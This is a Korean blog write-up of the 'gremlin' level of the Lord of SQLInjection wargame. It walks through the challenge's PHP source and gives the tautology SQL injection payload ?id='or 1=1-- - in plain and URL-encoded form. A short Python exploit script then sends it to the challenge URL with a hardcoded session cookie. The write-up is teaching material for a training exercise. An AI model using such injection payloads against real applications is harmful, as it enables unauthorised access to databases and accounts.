[LORD OF SQLINJECTION]gremlin

🌆│Web_Study/🚠│Lord_of_SQLInjection

[LORD OF SQLINJECTION]gremlin

Jastes 2023. 4. 29. 09:00

Write Up

처음이니까 위 문제들은 query문과 해당 소스코드를 알려줍니다.
이를 이용하여 solve() 함수를 실행시키면 문제가 풀리는 형식입니다.

https://los.rubiya.kr/gate.php

los.rubiya.kr

소스 코드 분석

file setup 부분과 preg_match 부분은 기본적인 php 문법이므로 설명을 넘어가고
preg_match의 경우 _, ., () 부분을 필터링하는 모습입니다.

참고로 정규표현식으로 정리하며, 해석사이트는 하단에 있습니다.

RegExr: Learn, Build, & Test RegEx

RegExr is an online tool to learn, build, & test Regular Expressions (RegEx / RegExp).

regexr.com

그러하면 query 부분의 where절을 통해 id를 불러오고 result의 변수에..
하단의 링크의 함수를 사용하는 모습입니다. 해서 얻은 ID가 존재한다면 solve 함수를 실행

PHP: mysqli_result::fetch_array - Manual

query($query);/* numeric array */$row = $result->fetch_array(MYSQLI_NUM);printf("%s (%s)\n", $row[0], $row[1]);/* associative array */$row = $result->fetch_array(MYSQLI_ASSOC);printf("%s (%s)\n", $row["Name"], $row["CountryCode"]);/* associative and numeri

www.php.net

Soultion

Where의 주석(우회)

https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php

?id=%27%20or%201=1%20--%20-
?id='or 1=1-- -

해당 부분은 GET방식으로 얻기에 URL에 입력을 하여 SQL문을 동작합니다.

SQL Injection

1. Background: Relational DBMS 1. 데이터베이스 기본 개념과 DBMS - By L.M.S 1. 데이터베이스 필요성 더보기 💡KEYWORD - 데이터베이스 필요성 - 데이터베이스 정의와 특성 - 데이터와 데이터베이스 - DBMS, 데

dystopia050119.tistory.com

여기서 기본 계념과 앞으로 배울 내용을 알 수 있고 배운 내용을 바탕으로
문제를 풀어봅시다.

Exploit code

#!/usr/bin/python3
from requests import get
from pwn import *
#import sys

# Argument check (Cookie)
'''if len(sys.argv) != 2:
    print(sys.argv[0] + " [PHPSESSID Cookie]")
print(type(sys.argv[1]))

session = {sys.argv[1]}
'''


'''
headers = {
    'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'cookies' : 'PHPSESSID={0}'.format(session) 
}
'''

url = 'https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php'
cookies = dict(PHPSESSID='ans45ovi49hnu9bs96407ahndf')

payload = ''
param = "?id='or 1=1-- -"

def pw_leak(url, query):
    payload = url
    payload += query
    r = get(payload, cookies=cookies)

    if r.text.find("<h2>GREMLIN Clear!</h2>") > 0:
        log.success('Success!!')
    else:
        log.failure('false :(')


if __name__ in "__main__":
    print(url)
    pw_leak(url, param)

참고 자료

참고 이미지

저작자표시 비영리 변경금지